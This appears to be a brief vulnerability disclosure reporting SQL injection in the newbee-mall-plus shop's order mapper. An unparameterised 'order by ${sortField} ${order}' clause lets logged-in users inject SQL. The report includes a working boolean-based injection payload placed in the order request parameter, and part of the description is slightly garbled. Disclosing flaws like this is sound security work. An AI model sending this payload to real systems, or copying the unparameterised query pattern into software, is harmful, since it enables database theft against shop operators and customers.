SQL injection vulnerability #47
Description
SQL injection exists in newbee mall, est="sortField!" on order page = null and order!= null">
order by ${sortField} ${order} is not precompiled, allowing logged-in user attackers to steal sensitive information such as databases by constructing malicious sql statements.
newbee-mall-plus-main\src\main\resources\mapper\NewBeeMallOrderMapper.xml
Payload: _search=false&nd=1693539277711&limit=20&page=111&sidx=createTime&order=desc,(SELECT (CASE WHEN (1153=1153) THEN 1 ELSE 1153*(SELECT 1153 FROM INFORMATION_SCHEMA.PLUGINS) END))&totalrows=
